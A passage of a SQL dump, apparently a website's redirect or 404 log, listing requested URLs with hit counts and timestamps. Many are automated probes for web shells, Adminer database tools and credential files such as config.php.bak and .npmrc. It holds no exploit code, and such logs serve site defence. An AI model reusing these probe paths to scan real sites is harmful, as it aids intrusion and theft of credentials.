11:59:04','0000-00-00 00:00:00',301),(54317,'http://3s-technologies.com.tr/tr/adminer-4.7.5-en.php',NULL,'','',1,0,'2025-12-21 11:59:06','0000-00-00 00:00:00',301),(54318,'http://3s-technologies.com.tr/tr/pvqdq929bsx_a_d_m1n_a.php',NULL,'','',1,0,'2025-12-21 11:59:09','0000-00-00 00:00:00',301),(54319,'http://3s-technologies.com.tr/tr/adminer-4.7.6-en.php',NULL,'','',2,0,'2025-12-21 11:59:11','0000-00-00 00:00:00',301),(54320,'http://3s-technologies.com.tr/tr/adminer-4.2.3-mysql.php',NULL,'','',1,0,'2025-12-21 11:59:13','0000-00-00 00:00:00',301),(54321,'http://3s-technologies.com.tr/tr/sell.php',NULL,'','',1,0,'2025-12-21 11:59:16','0000-00-00 00:00:00',301),(54322,'http://3s-technologies.com.tr/tr/adminer-4.3.0-mysql.php',NULL,'','',1,0,'2025-12-21 11:59:17','0000-00-00 00:00:00',301),(54323,'http://3s-technologies.com.tr/tr/adminer-4.4.0-mysql.php',NULL,'','',1,0,'2025-12-21 11:59:19','0000-00-00 00:00:00',301),(54324,'http://3s-technologies.com.tr/tr/adminer-4.5.0-mysql.php',NULL,'','',1,0,'2025-12-21 11:59:20','0000-00-00 00:00:00',301),(54325,'http://3s-technologies.com.tr/tr/adminer-4.6.0-mysql.php',NULL,'','',1,0,'2025-12-21 11:59:21','0000-00-00 00:00:00',301),(54326,'http://3s-technologies.com.tr/tr/adminer-4.6.1-mysql.php',NULL,'','',2,0,'2025-12-21 11:59:22','0000-00-00 00:00:00',301),(54327,'http://3s-technologies.com.tr/tr/adminer-4.6.3-mysql.php',NULL,'','',1,0,'2025-12-21 11:59:24','0000-00-00 00:00:00',301),(54328,'http://3s-technologies.com.tr/tr/lzyrj.php',NULL,'','',3,0,'2025-12-22 11:54:58','0000-00-00 00:00:00',301),(54329,'http://3s-technologies.com.tr/tr/laudq.php',NULL,'','',3,0,'2025-12-22 11:54:58','0000-00-00 00:00:00',301),(54330,'http://3s-technologies.com.tr/tr/anjay.php',NULL,'','',3,0,'2025-12-22 11:54:59','0000-00-00 00:00:00',301),(54331,'http://3s-technologies.com.tr/tr/admin/js/wp-conflg.php',NULL,'','',1,0,'2025-12-22 19:37:04','0000-00-00 00:00:00',301),(54332,'http://3s-technologies.com.tr/tr/yonetim/login.php',NULL,'','',1,0,'2025-12-23 18:56:21','0000-00-00 00:00:00',301),(54333,'http://3s-technologies.com.tr/tr/panel/login.php',NULL,'','',1,0,'2025-12-23 18:56:21','0000-00-00 00:00:00',301),(54334,'http://3s-technologies.com.tr/en/htio.php',NULL,'https://www.google.com/','',1,0,'2025-12-23 19:09:34','0000-00-00 00:00:00',301),(54335,'http://3s-technologies.com.tr/en/os.php',NULL,'https://www.google.de/','',1,0,'2025-12-23 19:09:35','0000-00-00 00:00:00',301),(54336,'http://3s-technologies.com.tr/tr/bless1.php',NULL,'','',2,0,'2025-12-23 21:27:46','0000-00-00 00:00:00',301),(54337,'https://www.3s-technologies.com.tr/tr/y30hnqwkrgq3gow2obsg',NULL,'https://www.3s-technologies.com.tr/y30hNQWKRgq3Gow2obsg','',1,0,'2025-12-23 21:45:37','0000-00-00 00:00:00',301),(54338,'http://3s-technologies.com.tr/tr/tmp/kickstart.php',NULL,'','',5,0,'2025-12-24 02:11:19','0000-00-00 00:00:00',301),(54339,'https://3s-technologies.com.tr/tr/pub/rf',NULL,'https://3s-technologies.com.tr/pub/rf','',1,0,'2025-12-24 07:14:07','0000-00-00 00:00:00',301),(54340,'http://3s-technologies.com.tr/tr/423_index.php',NULL,'','',4,0,'2025-12-24 11:16:21','0000-00-00 00:00:00',301),(54341,'https://3s-technologies.com.tr/tr/assets/responsysimages',NULL,'https://3s-technologies.com.tr/assets/responsysimages','',1,0,'2025-12-24 12:01:06','0000-00-00 00:00:00',301),(54342,'https://www.3s-technologies.com.tr/tr/assets/responsysimages',NULL,'https://www.3s-technologies.com.tr/assets/responsysimages','',1,0,'2025-12-24 12:53:11','0000-00-00 00:00:00',301),(54343,'https://mail.3s-technologies.com.tr/tr/assets/responsysimages',NULL,'https://mail.3s-technologies.com.tr/assets/responsysimages','',1,0,'2025-12-24 15:40:28','0000-00-00 00:00:00',301),(54344,'http://3s-technologies.com.tr/tr/ultra.php',NULL,'','',5,0,'2025-12-24 15:47:12','0000-00-00 00:00:00',301),(54345,'http://3s-technologies.com.tr/tr/wp-admin/classwithtostring.php/.well-known/acme-challenge/file.php',NULL,'','',5,0,'2025-12-24 15:47:19','0000-00-00 00:00:00',301),(54346,'http://3s-technologies.com.tr/tr/wp-content/uploads/wc-logs',NULL,'','',1,0,'2025-12-24 15:47:57','0000-00-00 00:00:00',301),(54347,'http://3s-technologies.com.tr/tr/wp-includes/text/autoload_classmap.php/.well-known/acme-challenge/file.php',NULL,'','',5,0,'2025-12-24 15:48:11','0000-00-00 00:00:00',301),(54348,'http://3s-technologies.com.tr/tr/wp-includes/blocks/code',NULL,'','',11,0,'2025-12-24 15:48:20','0000-00-00 00:00:00',301),(54349,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/autoload_classmap.php/.well-known/acme-challenge/file.php',NULL,'','',5,0,'2025-12-24 15:48:37','0000-00-00 00:00:00',301),(54350,'http://3s-technologies.com.tr/tr/xmldoc',NULL,'','',1,0,'2025-12-24 15:48:44','0000-00-00 00:00:00',301),(54351,'https://3s-technologies.com.tr/tr/non_existing_path',NULL,'https://3s-technologies.com.tr/NON_EXISTING_PATH/','',1,0,'2025-12-24 16:38:08','0000-00-00 00:00:00',301),(54352,'https://www.3s-technologies.com.tr/tr/non_existing_path',NULL,'https://www.3s-technologies.com.tr/NON_EXISTING_PATH/','',1,0,'2025-12-24 17:31:29','0000-00-00 00:00:00',301),(54353,'https://mail.3s-technologies.com.tr/tr/non_existing_path',NULL,'https://mail.3s-technologies.com.tr/NON_EXISTING_PATH/','',1,0,'2025-12-24 20:17:39','0000-00-00 00:00:00',301),(54354,'http://3s-technologies.com.tr/en/wp-admin/wp-admin/css.php',NULL,'http://3s-technologies.com.tr/wp-admin/wp-admin/css.php','',1,0,'2025-12-25 08:06:26','0000-00-00 00:00:00',301),(54355,'http://www.3s-technologies.com.tr/tr/css/up.php',NULL,'','',1,0,'2025-12-25 17:18:48','0000-00-00 00:00:00',301),(54356,'http://www.3s-technologies.com.tr/tr/static/as.php',NULL,'','',1,0,'2025-12-25 17:20:00','0000-00-00 00:00:00',301),(54357,'http://www.3s-technologies.com.tr/tr/zxz.php',NULL,'','',1,0,'2025-12-25 17:21:21','0000-00-00 00:00:00',301),(54358,'https://3s-technologies.com.tr/tr/config.php.bak',NULL,'https://3s-technologies.com.tr/config.php.bak','',8,0,'2025-12-25 19:48:22','0000-00-00 00:00:00',301),(54359,'https://3s-technologies.com.tr/tr/.npmrc',NULL,'https://3s-technologies.com.tr/.npmrc','',1,0,'2025-12-25 19:48:25','0000-00-00 00:00:00',301),(54360,'https://3s-technologies.com.tr/tr/actuator',NULL,'https://3s-technologies.com.tr/actuator','',2,0,'2025-12-25 22:09:39','0000-00-00 00:00:00',301),(54361,'http://3s-technologies.com.tr/tr/admin/controller/extension/extension/vx.php',NULL,'','',4,0,'2025-12-26 00:45:36','0000-00-00 00:00:00',301),(54362,'http://3s-technologies.com.tr/tr/wp-includes/random_compat/vx.php',NULL,'','',4,0,'2025-12-26 00:45:38','0000-00-00 00:00:00',301),(54363,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/vx.php',NULL,'','',4,0,'2025-12-26 00:45:41','0000-00-00 00:00:00',301),(54364,'http://3s-technologies.com.tr/tr/wp-includes/assets/vx.php',NULL,'','',4,0,'2025-12-26 00:45:42','0000-00-00 00:00:00',301),(54365,'http://3s-technologies.com.tr/tr/assets/vx.php',NULL,'','',4,0,'2025-12-26 00:45:43','0000-00-00 00:00:00',301),(54366,'http://3s-technologies.com.tr/tr/images/images/vx.php',NULL,'','',4,0,'2025-12-26 00:45:52','0000-00-00 00:00:00',301),(54367,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/colorpicker/wp-login.php',NULL,'','',4,0,'2025-12-26 00:46:03','0000-00-00 00:00:00',301),(54368,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/vx.php',NULL,'','',4,0,'2025-12-26 00:46:06','0000-00-00 00:00:00',301),(54369,'http://3s-technologies.com.tr/tr/wp-admin/css/vx.php',NULL,'','',4,0,'2025-12-26 00:46:07','0000-00-00 00:00:00',301),(54370,'http://3s-technologies.com.tr/tr/wp-includes/customize/vx.php',NULL,'','',4,0,'2025-12-26 00:46:12','0000-00-00 00:00:00',301),(54371,'http://3s-technologies.com.tr/tr/wp-includes/block-bindings/vx.php',NULL,'','',4,0,'2025-12-26 00:46:14','0000-00-00 00:00:00',301),(54372,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/vx.php',NULL,'','',4,0,'2025-12-26 00:46:18','0000-00-00 00:00:00',301),(54373,'http://3s-technologies.com.tr/tr/wp-admin/network/vx.php',NULL,'','',4,0,'2025-12-26 00:46:23','0000-00-00 00:00:00',301),(54374,'http://3s-technologies.com.tr/tr/adminfuns.php/.well-known/acme-challenge/file.php',NULL,'','',6,0,'2025-12-26 00:46:26','0000-00-00 00:00:00',301),(54375,'http://3s-technologies.com.tr/tr/wp-includes/images/vx.php',NULL,'','',4,0,'2025-12-26 00:46:27','0000-00-00 00:00:00',301),(54376,'http://3s-technologies.com.tr/tr/wp-content/uploads/vx.php',NULL,'','',4,0,'2025-12-26 00:46:28','0000-00-00 00:00:00',301),(54377,'http://3s-technologies.com.tr/tr/wp-admin/images/vx.php',NULL,'','',4,0,'2025-12-26 00:46:30','0000-00-00 00:00:00',301),(54378,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/vx.php',NULL,'','',4,0,'2025-12-26 00:46:35','0000-00-00 00:00:00',301),(54379,'http://3s-technologies.com.tr/tr/db6d0/vx.php',NULL,'','',4,0,'2025-12-26 00:46:42','0000-00-00 00:00:00',301),(54380,'http://3s-technologies.com.tr/tr/xmldoc/vx.php',NULL,'','',4,0,'2025-12-26 00:46:46','0000-00-00 00:00:00',301),(54381,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag/vx.php',NULL,'','',4,0,'2025-12-26 00:46:52','0000-00-00 00:00:00',301),(54382,'http://3s-technologies.com.tr/tr/admin.php/.well-known/acme-challenge/file.php',NULL,'','',4,0,'2025-12-26 00:46:58','0000-00-00 00:00:00',301),(54383,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean/vx.php',NULL,'','',4,0,'2025-12-26 00:47:02','0000-00-00 00:00:00',301),(54384,'http://3s-technologies.com.tr/tr/wp-content/uploads/wc-logs/vx.php',NULL,'','',4,0,'2025-12-26 00:47:08','0000-00-00 00:00:00',301),(54385,'http://3s-technologies.com.tr/tr/wp-includes/fonts/vx.php',NULL,'','',4,0,'2025-12-26 00:47:10','0000-00-00 00:00:00',301),(54386,'http://3s-technologies.com.tr/tr/wp-admin/includes/vx.php',NULL,'','',4,0,'2025-12-26 00:47:23','0000-00-00 00:00:00',301),(54387,'http://3s-technologies.com.tr/tr/wp-includes/block-bindings/index.php',NULL,'','',4,0,'2025-12-26 00:47:24','0000-00-00 00:00:00',301),(54388,'http://3s-technologies.com.tr/tr/wp-content/languages/vx.php',NULL,'','',4,0,'2025-12-26 00:47:29','0000-00-00 00:00:00',301),(54389,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/vx.php',NULL,'','',4,0,'2025-12-26 00:47:38','0000-00-00 00:00:00',301),(54390,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/vx.php',NULL,'','',4,0,'2025-12-26 00:47:46','0000-00-00 00:00:00',301),(54391,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/fields/vx.php',NULL,'','',4,0,'2025-12-26 00:47:57','0000-00-00 00:00:00',301),(54392,'http://3s-technologies.com.tr/tr/wp-includes/id3/vx.php',NULL,'','',4,0,'2025-12-26 00:48:03','0000-00-00 00:00:00',301),(54393,'http://3s-technologies.com.tr/tr/wp-admin/vx.php',NULL,'','',4,0,'2025-12-26 00:48:06','0000-00-00 00:00:00',301),(54394,'http://3s-technologies.com.tr/tr/wp-content/themes/vx.php',NULL,'','',4,0,'2025-12-26 00:48:14','0000-00-00 00:00:00',301),(54395,'http://mail.3s-technologies.com.tr/tr/d4.php',NULL,'','',1,0,'2025-12-26 03:05:16','0000-00-00 00:00:00',301),(54396,'http://mail.3s-technologies.com.tr/tr/npi.php',NULL,'','',1,0,'2025-12-26 03:05:21','0000-00-00 00:00:00',301),(54397,'http://mail.3s-technologies.com.tr/tr/ask.php',NULL,'','',1,0,'2025-12-26 03:05:29','0000-00-00 00:00:00',301),(54398,'http://mail.3s-technologies.com.tr/tr/fjpeb.php',NULL,'','',1,0,'2025-12-26 03:05:31','0000-00-00 00:00:00',301),(54399,'http://mail.3s-technologies.com.tr/tr/sfvul.php',NULL,'','',1,0,'2025-12-26 03:05:41','0000-00-00 00:00:00',301),(54400,'http://mail.3s-technologies.com.tr/tr/icdwb.php',NULL,'','',1,0,'2025-12-26 03:05:42','0000-00-00 00:00:00',301),(54401,'http://mail.3s-technologies.com.tr/tr/ticket.php',NULL,'','',5,0,'2025-12-26 03:05:42','0000-00-00 00:00:00',301),(54402,'http://mail.3s-technologies.com.tr/tr/minik.php',NULL,'','',2,0,'2025-12-26 03:05:47','0000-00-00 00:00:00',301),(54403,'http://mail.3s-technologies.com.tr/tr/tll.php',NULL,'','',1,0,'2025-12-26 03:05:52','0000-00-00 00:00:00',301),(54404,'http://mail.3s-technologies.com.tr/tr/idea.php',NULL,'','',1,0,'2025-12-26 03:05:53','0000-00-00 00:00:00',301),(54405,'http://mail.3s-technologies.com.tr/tr/ucp.php',NULL,'','',1,0,'2025-12-26 03:05:58','0000-00-00 00:00:00',301),(54406,'http://mail.3s-technologies.com.tr/tr/price.php',NULL,'','',1,0,'2025-12-26 03:06:04','0000-00-00 00:00:00',301),(54407,'http://mail.3s-technologies.com.tr/tr/randkeyword.php',NULL,'','',16,0,'2025-12-26 03:34:29','0000-00-00 00:00:00',301),(54408,'http://mail.3s-technologies.com.tr/tr/images/m.php',NULL,'','',15,0,'2025-12-26 03:34:31','0000-00-00 00:00:00',301),(54409,'http://mail.3s-technologies.com.tr/tr/tx1.php',NULL,'','',19,0,'2025-12-26 03:34:33','0000-00-00 00:00:00',301),(54410,'http://mail.3s-technologies.com.tr/tr/x56.php',NULL,'','',17,0,'2025-12-26 03:34:35','0000-00-00 00:00:00',301),(54411,'http://mail.3s-technologies.com.tr/tr/x50.php',NULL,'','',17,0,'2025-12-26 03:34:37','0000-00-00 00:00:00',301),(54412,'http://mail.3s-technologies.com.tr/tr/lsd.php',NULL,'','',18,0,'2025-12-26 03:34:40','0000-00-00 00:00:00',301),(54413,'http://mail.3s-technologies.com.tr/tr/atx.php',NULL,'','',19,0,'2025-12-26 03:34:45','0000-00-00 00:00:00',301),(54414,'http://mail.3s-technologies.com.tr/tr/z60.php',NULL,'','',25,0,'2025-12-26 03:34:46','0000-00-00 00:00:00',301),(54415,'http://mail.3s-technologies.com.tr/tr/security.php',NULL,'','',20,0,'2025-12-26 03:35:43','0000-00-00 00:00:00',301),(54416,'http://mail.3s-technologies.com.tr/tr/ioxi-o1.php',NULL,'','',17,0,'2025-12-26 03:35:59','0000-00-00 00:00:00',301),(54417,'http://mail.3s-technologies.com.tr/tr/juuuu.php',NULL,'','',16,0,'2025-12-26 03:35:59','0000-00-00 00:00:00',301),(54418,'http://mail.3s-technologies.com.tr/tr/ha.php',NULL,'','',19,0,'2025-12-26 03:36:00','0000-00-00 00:00:00',301),(54419,'http://mail.3s-technologies.com.tr/tr/files.php',NULL,'','',18,0,'2025-12-26 03:36:14','0000-00-00 00:00:00',301),(54420,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/about.php',NULL,'','',18,0,'2025-12-26 03:36:17','0000-00-00 00:00:00',301),(54421,'http://mail.3s-technologies.com.tr/tr/nox.php',NULL,'','',19,0,'2025-12-26 03:36:18','0000-00-00 00:00:00',301),(54422,'http://mail.3s-technologies.com.tr/tr/la.php',NULL,'','',24,0,'2025-12-26 03:36:21','0000-00-00 00:00:00',301),(54423,'http://mail.3s-technologies.com.tr/tr/ccou.php',NULL,'','',32,0,'2025-12-26 03:36:23','0000-00-00 00:00:00',301),(54424,'http://mail.3s-technologies.com.tr/tr/ac.php',NULL,'','',18,0,'2025-12-26 03:36:26','0000-00-00 00:00:00',301),(54425,'http://mail.3s-technologies.com.tr/tr/az.php',NULL,'','',26,0,'2025-12-26 03:36:29','0000-00-00 00:00:00',301),(54426,'http://mail.3s-technologies.com.tr/tr/xaz.php',NULL,'','',16,0,'2025-12-26 03:36:29','0000-00-00 00:00:00',301),(54427,'http://mail.3s-technologies.com.tr/tr/up4.php',NULL,'','',18,0,'2025-12-26 03:36:30','0000-00-00 00:00:00',301),(54428,'http://mail.3s-technologies.com.tr/tr/wtz.php',NULL,'','',15,0,'2025-12-26 03:36:33','0000-00-00 00:00:00',301),(54429,'http://mail.3s-technologies.com.tr/tr/galex.php',NULL,'','',21,0,'2025-12-26 03:36:34','0000-00-00 00:00:00',301),(54430,'http://mail.3s-technologies.com.tr/tr/xb.php',NULL,'','',18,0,'2025-12-26 03:36:35','0000-00-00 00:00:00',301),(54431,'http://mail.3s-technologies.com.tr/tr/vx.php',NULL,'','',52,0,'2025-12-26 03:36:37','0000-00-00 00:00:00',301),(54432,'http://mail.3s-technologies.com.tr/tr/rh.php',NULL,'','',31,0,'2025-12-26 03:36:37','0000-00-00 00:00:00',301),(54433,'http://www.3s-technologies.com.tr/tr/images/m.php',NULL,'','',4,0,'2025-12-26 12:52:21','0000-00-00 00:00:00',301),(54434,'http://www.3s-technologies.com.tr/tr/tx1.php',NULL,'','',4,0,'2025-12-26 12:52:24','0000-00-00 00:00:00',301),(54435,'http://www.3s-technologies.com.tr/tr/xv.php',NULL,'','',4,0,'2025-12-26 12:52:24','0000-00-00 00:00:00',301),(54436,'http://www.3s-technologies.com.tr/tr/x56.php',NULL,'','',4,0,'2025-12-26 12:52:26','0000-00-00 00:00:00',301),(54437,'http://www.3s-technologies.com.tr/tr/htaccess.php',NULL,'','',4,0,'2025-12-26 12:52:26','0000-00-00 00:00:00',301),(54438,'http://www.3s-technologies.com.tr/tr/readme.php',NULL,'','',6,0,'2025-12-26 12:52:27','0000-00-00 00:00:00',301),(54439,'http://www.3s-technologies.com.tr/tr/x50.php',NULL,'','',4,0,'2025-12-26 12:52:28','0000-00-00 00:00:00',301),(54440,'http://www.3s-technologies.com.tr/tr/fv.php',NULL,'','',4,0,'2025-12-26 12:52:29','0000-00-00 00:00:00',301),(54441,'http://www.3s-technologies.com.tr/tr/lsd.php',NULL,'','',4,0,'2025-12-26 12:52:31','0000-00-00 00:00:00',301),(54442,'http://www.3s-technologies.com.tr/tr/gtc.php',NULL,'','',5,0,'2025-12-26 12:52:36','0000-00-00 00:00:00',301),(54443,'http://www.3s-technologies.com.tr/tr/atx.php',NULL,'','',4,0,'2025-12-26 12:52:37','0000-00-00 00:00:00',301),(54444,'http://www.3s-technologies.com.tr/tr/z60.php',NULL,'','',5,0,'2025-12-26 12:52:39','0000-00-00 00:00:00',301),(54445,'http://www.3s-technologies.com.tr/tr/themes/twentytwentytwo/index.php',NULL,'','',4,0,'2025-12-26 12:53:10','0000-00-00 00:00:00',301),(54446,'http://www.3s-technologies.com.tr/tr/wp-admin/wp-conflg.php?p=',NULL,'','',4,0,'2025-12-26 12:53:12','0000-00-00 00:00:00',301),(54447,'http://www.3s-technologies.com.tr/tr/plugins/cache/footer.php',NULL,'','',4,0,'2025-12-26 12:53:16','0000-00-00 00:00:00',301),(54448,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/admin.php',NULL,'','',4,0,'2025-12-26 12:53:21','0000-00-00 00:00:00',301),(54449,'http://www.3s-technologies.com.tr/tr/wp-trackback.php',NULL,'','',8,0,'2025-12-26 12:53:25','0000-00-00 00:00:00',301),(54450,'http://www.3s-technologies.com.tr/tr/wp-admin/network/plugins.php',NULL,'','',4,0,'2025-12-26 12:53:28','0000-00-00 00:00:00',301),(54451,'http://www.3s-technologies.com.tr/tr/css/index.php',NULL,'','',9,0,'2025-12-26 12:53:32','0000-00-00 00:00:00',301),(54452,'http://www.3s-technologies.com.tr/tr/wp-includes/simplepie/wp-login.php',NULL,'','',4,0,'2025-12-26 12:53:34','0000-00-00 00:00:00',301),(54453,'http://www.3s-technologies.com.tr/tr/filemanager/dialog.php',NULL,'','',4,0,'2025-12-26 12:53:36','0000-00-00 00:00:00',301),(54454,'http://www.3s-technologies.com.tr/tr/uploads/autoload_classmap.php',NULL,'','',4,0,'2025-12-26 12:53:40','0000-00-00 00:00:00',301),(54455,'http://www.3s-technologies.com.tr/tr/ww1.php',NULL,'','',4,0,'2025-12-26 12:53:42','0000-00-00 00:00:00',301),(54456,'http://www.3s-technologies.com.tr/tr/css/colors/blue/index.php',NULL,'','',4,0,'2025-12-26 12:53:47','0000-00-00 00:00:00',301),(54457,'http://www.3s-technologies.com.tr/tr/security.php',NULL,'','',5,0,'2025-12-26 12:53:51','0000-00-00 00:00:00',301),(54458,'http://www.3s-technologies.com.tr/tr/wp-content/radio.php',NULL,'','',9,0,'2025-12-26 12:53:56','0000-00-00 00:00:00',301),(54459,'http://www.3s-technologies.com.tr/tr/.well-known/admin.php',NULL,'','',5,0,'2025-12-26 12:53:58','0000-00-00 00:00:00',301),(54460,'http://www.3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/index.php?p=',NULL,'','',4,0,'2025-12-26 12:54:02','0000-00-00 00:00:00',301),(54461,'http://www.3s-technologies.com.tr/tr/wp-includes/block-patterns/index.php',NULL,'','',5,0,'2025-12-26 12:54:07','0000-00-00 00:00:00',301),(54462,'http://www.3s-technologies.com.tr/tr/ioxi-o1.php',NULL,'','',4,0,'2025-12-26 12:54:10','0000-00-00 00:00:00',301),(54463,'http://www.3s-technologies.com.tr/tr/juuuu.php',NULL,'','',4,0,'2025-12-26 12:54:12','0000-00-00 00:00:00',301),(54464,'http://www.3s-technologies.com.tr/tr/ha.php',NULL,'','',5,0,'2025-12-26 12:54:13','0000-00-00 00:00:00',301),(54465,'http://www.3s-technologies.com.tr/tr/ave.php',NULL,'','',4,0,'2025-12-26 12:54:26','0000-00-00 00:00:00',301),(54466,'http://www.3s-technologies.com.tr/tr/wrt.php',NULL,'','',8,0,'2025-12-26 12:54:27','0000-00-00 00:00:00',301),(54467,'http://www.3s-technologies.com.tr/tr/bibil.php',NULL,'','',4,0,'2025-12-26 12:54:28','0000-00-00 00:00:00',301),(54468,'http://www.3s-technologies.com.tr/tr/files.php',NULL,'','',5,0,'2025-12-26 12:54:31','0000-00-00 00:00:00',301),(54469,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/about.php',NULL,'','',4,0,'2025-12-26 12:54:33','0000-00-00 00:00:00',301),(54470,'http://www.3s-technologies.com.tr/tr/nox.php',NULL,'','',5,0,'2025-12-26 12:54:34','0000-00-00 00:00:00',301),(54471,'http://www.3s-technologies.com.tr/tr/file48.php',NULL,'','',8,0,'2025-12-26 12:54:35','0000-00-00 00:00:00',301),(54472,'http://www.3s-technologies.com.tr/tr/la.php',NULL,'','',7,0,'2025-12-26 12:54:39','0000-00-00 00:00:00',301),(54473,'http://www.3s-technologies.com.tr/tr/ccou.php',NULL,'','',6,0,'2025-12-26 12:54:43','0000-00-00 00:00:00',301),(54474,'http://www.3s-technologies.com.tr/tr/ac.php',NULL,'','',5,0,'2025-12-26 12:54:47','0000-00-00 00:00:00',301),(54475,'http://www.3s-technologies.com.tr/tr/pop.php',NULL,'','',4,0,'2025-12-26 12:54:49','0000-00-00 00:00:00',301),(54476,'http://www.3s-technologies.com.tr/tr/az.php',NULL,'','',5,0,'2025-12-26 12:54:50','0000-00-00 00:00:00',301),(54477,'http://www.3s-technologies.com.tr/tr/xaz.php',NULL,'','',4,0,'2025-12-26 12:54:51','0000-00-00 00:00:00',301),(54478,'http://www.3s-technologies.com.tr/tr/up4.php',NULL,'','',4,0,'2025-12-26 12:54:52','0000-00-00 00:00:00',301),(54479,'http://www.3s-technologies.com.tr/tr/wtz.php',NULL,'','',4,0,'2025-12-26 12:54:55','0000-00-00 00:00:00',301),(54480,'http://www.3s-technologies.com.tr/tr/galex.php',NULL,'','',4,0,'2025-12-26 12:54:56','0000-00-00 00:00:00',301),(54481,'http://www.3s-technologies.com.tr/tr/xb.php',NULL,'','',4,0,'2025-12-26 12:54:58','0000-00-00 00:00:00',301),(54482,'http://www.3s-technologies.com.tr/tr/vx.php',NULL,'','',13,0,'2025-12-26 12:55:00','0000-00-00 00:00:00',301),(54483,'http://www.3s-technologies.com.tr/tr/rh.php',NULL,'','',6,0,'2025-12-26 12:55:01','0000-00-00 00:00:00',301),(54484,'http://3s-technologies.com.tr/tr/maint.php',NULL,'','',2,0,'2025-12-26 14:20:08','0000-00-00 00:00:00',301),(54485,'http://3s-technologies.com.tr/tr/pwnd.php',NULL,'','',2,0,'2025-12-26 14:20:36','0000-00-00 00:00:00',301),(54486,'http://3s-technologies.com.tr/tr/admin_250714170928.php',NULL,'','',1,0,'2025-12-26 14:20:38','0000-00-00 00:00:00',301),(54487,'http://3s-technologies.com.tr/tr/admin_250714203832.php',NULL,'','',2,0,'2025-12-26 14:20:39','0000-00-00 00:00:00',301),(54488,'http://3s-technologies.com.tr/tr/class-envato-market-github.php',NULL,'','',1,0,'2025-12-26 14:20:49','0000-00-00 00:00:00',301),(54489,'http://3s-technologies.com.tr/tr/leleka_na_dakhu_skhovav_kabluchku_u_kamizelku_shchob_khutko_osvidchytys_khovrashku',NULL,'','',1,0,'2025-12-26 16:09:57','0000-00-00 00:00:00',301),(54490,'https://3s-technologies.com.tr/tr///modules/mod_djimageslider/themes/default/images/prev.png',NULL,'','',1,0,'2025-12-26 16:10:00','0000-00-00 00:00:00',301),(54491,'https://3s-technologies.com.tr/tr///images/logo/logo-3s.jpg',NULL,'','',1,0,'2025-12-26 16:10:00','0000-00-00 00:00:00',301),(54492,'https://3s-technologies.com.tr/tr///media/mod_languages/images/en.gif',NULL,'','',1,0,'2025-12-26 16:10:01','0000-00-00 00:00:00',301),(54493,'https://3s-technologies.com.tr/tr///templates/beez5/images/fruits.jpg',NULL,'','',1,0,'2025-12-26 16:10:01','0000-00-00 00:00:00',301),(54494,'https://3s-technologies.com.tr/tr///modules/mod_djimageslider/themes/default/images/play.png',NULL,'','',1,0,'2025-12-26 16:10:01','0000-00-00 00:00:00',301),(54495,'https://3s-technologies.com.tr/tr///modules/mod_djimageslider/themes/default/images/next.png',NULL,'','',1,0,'2025-12-26 16:10:01','0000-00-00 00:00:00',301),(54496,'https://3s-technologies.com.tr/tr///templates/beez5/images/plus.png',NULL,'','',1,0,'2025-12-26 16:10:01','0000-00-00 00:00:00',301),(54497,'https://3s-technologies.com.tr/tr///modules/mod_djimageslider/themes/default/images/pause.png',NULL,'','',1,0,'2025-12-26 16:10:01','0000-00-00 00:00:00',301),(54498,'https://3s-technologies.com.tr/tr///media/mod_languages/images/tr.gif',NULL,'','',1,0,'2025-12-26 16:10:02','0000-00-00 00:00:00',301),(54499,'https://3s-technologies.com.tr/tr///images/ddm/le40v.png',NULL,'','',1,0,'2025-12-26 16:10:02','0000-00-00 00:00:00',301),(54500,'https://3s-technologies.com.tr/tr///media/mod_languages/css/template.css?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 00:00:00',301),(54501,'https://3s-technologies.com.tr/tr///templates/beez5/css/vmsite-ltr.css?vmver=1ca80efd',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 00:00:00',301),(54502,'https://3s-technologies.com.tr/tr///modules/mod_djimageslider/themes/default/css/djimageslider.css',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 00:00:00',301),(54503,'https://3s-technologies.com.tr/tr///templates/beez5/css/ieonly.css',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 00:00:00',301),(54504,'https://3s-technologies.com.tr/tr///templates/beez5/css/general.css',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 00:00:00',301),(54505,'https://3s-technologies.com.tr/tr///templates/beez5/css/general_mozilla.css',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 00:00:00',301),(54506,'https://3s-technologies.com.tr/tr///templates/beez5/css/layout.css',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 00:00:00',301),(54507,'https://3s-technologies.com.tr/tr///templates/system/css/system.css',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 00:00:00',301),(54508,'https://3s-technologies.com.tr/tr///templates/beez5/css/beez5.css',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 00:00:00',301),(54509,'https://3s-technologies.com.tr/tr///components/com_virtuemart/assets/css/chosen.css?vmver=1ca80efd',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 00:00:00',301),(54510,'https://3s-technologies.com.tr/tr///plugins/system/jce/css/content.css?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 00:00:00',301),(54511,'https://3s-technologies.com.tr/tr///templates/beez5/css/position.css',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 00:00:00',301),(54512,'https://3s-technologies.com.tr/tr///templates/beez5/css/ie7only.css',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 